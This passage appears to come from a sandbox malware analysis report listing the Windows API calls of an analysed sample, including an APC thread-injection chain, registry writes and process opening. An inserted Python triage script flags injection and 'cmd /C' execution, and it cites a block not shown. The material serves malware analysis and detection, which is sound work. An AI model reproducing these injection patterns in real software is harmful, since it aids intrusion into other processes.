  • GetLastError.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB498
    • Part of subcall function 001C6241: GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
    • Part of subcall function 001C6241: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001CB35F: CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
    • Part of subcall function 001CB35F: GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
    • Part of subcall function 001CB35F: GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
    • Part of subcall function 001CB35F: Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
    • Part of subcall function 001CB35F: OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
    • Part of subcall function 001CB35F: QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
    • Part of subcall function 001CB35F: Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
    • Part of subcall function 001C8215: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C822A
    • Part of subcall function 001C47EC: memcpy.NTDLL(001EA06C,?,00000028,00000000,001EC1F2,?,001CD6FE,?,?,00000000,001CB4E0,00000000,00000000), ref: 001C481E
    • Part of subcall function 001C47EC: HeapFree.KERNEL32(00000000,?,001EC1F2), ref: 001C484F
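The per-function API lists in this report are easier to triage mechanically than by eye. The Python below is an added example, not part of the Joe Sandbox report and not Joe Sandbox code: it parses the bullet-style call lines in the layout shown on this page, groups them per function block (each block starts at a "Memory Dump Source" line) and flags call combinations worth a first look, such as the CreateToolhelp32Snapshot / Thread32First / OpenThread / QueueUserAPC chain reported as a subcall in the block directly above (an APC queued to each thread of a target process) and the cmd /C "%s> %s1" string sitting next to CreateProcessA in the earlier block. The indicator rules and the embedded excerpt are constructed for this example; the excerpt copies (trimmed) lines from this report, and the regular expressions assume the line layout seen here.

```python
"""Triage of the per-function "APIs" lists in a Joe Sandbox report.

Added example, not part of this report or of Joe Sandbox: parses the bullet lines
shown on the page, groups them per "Memory Dump Source" block, flags API combinations.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# One API call line, with or without arguments, direct or "Part of subcall function", e.g.
#   • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
#   • Part of subcall function 001CB35F: CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
API_ID_RE = re.compile(r"^\s*•\s*API ID:\s*(?P<val>\S*)")

@dataclass
class Call:
    api: str
    args: list
    ref: str
    subcall: Optional[str]  # callee address for "Part of subcall function" entries

@dataclass
class FunctionBlock:
    api_id: str = ""
    calls: list = field(default_factory=list)

    def apis(self):
        return {c.api for c in self.calls}

def parse_report(text):
    """One FunctionBlock per "Memory Dump Source" section, holding its APIs entries."""
    blocks, current, section = [], None, None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "Memory Dump Source":
            current = FunctionBlock()
            blocks.append(current)
        if stripped in ("Memory Dump Source", "Similarity", "APIs", "Strings"):
            section = stripped
            continue
        m = API_ID_RE.match(line) if current else None
        if m:
            current.api_id = m["val"]
            continue
        m = CALL_RE.match(line) if (current and section == "APIs") else None
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            current.calls.append(Call(m["api"], args, m["ref"], m["sub"]))
    return blocks

# Indicator rules, constructed for this example from combinations seen in the report.
# Subcall entries count: the APC chain appears only as "Part of subcall function" lines.
def _apc_injection(b):
    return {"CreateToolhelp32Snapshot", "Thread32First", "OpenThread", "QueueUserAPC"} <= b.apis()

def _cmd_shell(b):
    has_cmd = any("cmd /C" in a for c in b.calls for a in c.args)
    return has_cmd and any(c.api.startswith("CreateProcess") for c in b.calls)

RULES = [
    ("APC queued to each thread of a target process", _apc_injection),
    ("command run through cmd /C", _cmd_shell),
]

def triage(text):
    """Map the API ID of every flagged block to the indicator names it trips."""
    hits = {}
    for b in parse_report(text):
        names = [name for name, pred in RULES if pred(b)]
        if names:
            hits[b.api_id] = names
    return hits

# Constructed excerpt: three blocks copied (trimmed) from the report above.
SAMPLE = """\
Memory Dump Source
  • API ID: CloseHandleCreateThreadGetCommandLineGetLastErrorGetModuleHandle
APIs
  • CreateThread.KERNEL32(00000000,00000000,001C6C08,00000000,00000000,001CD6FE), ref: 001CB485
    • Part of subcall function 001CB35F: CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
    • Part of subcall function 001CB35F: Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
    • Part of subcall function 001CB35F: OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
    • Part of subcall function 001CB35F: QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
Memory Dump Source
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
APIs
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
Memory Dump Source
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
APIs
  • CreateFileW.KERNEL32(01B37494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 01B34B26
"""

if __name__ == "__main__":
    for api_id, names in triage(SAMPLE).items():
        print(api_id, "->", "; ".join(names))
```

Feed it the full text of a report and the output is a short list of function blocks to open first; the set-based rules deliberately ignore call order, because the report lists subcall entries out of sequence, so a rule that needs ordering should be written against the "ref" addresses instead.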
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: a7ba591b065612ca5392502f724a25a23db9ce2fa7cff4761a80896cec28b3f4
  • Instruction ID: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
  • Opcode Fuzzy Hash: 51D05B95471CC4D3595E459D102515290C66C6530619CF5467751397655B30305CEF6D
  • Instruction Fuzzy Hash: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
APIs
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetCurrentThreadId.KERNEL32(?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 01B34BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 01B34BD9
  • lstrcpy.KERNEL32(00000000), ref: 01B34BE0
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
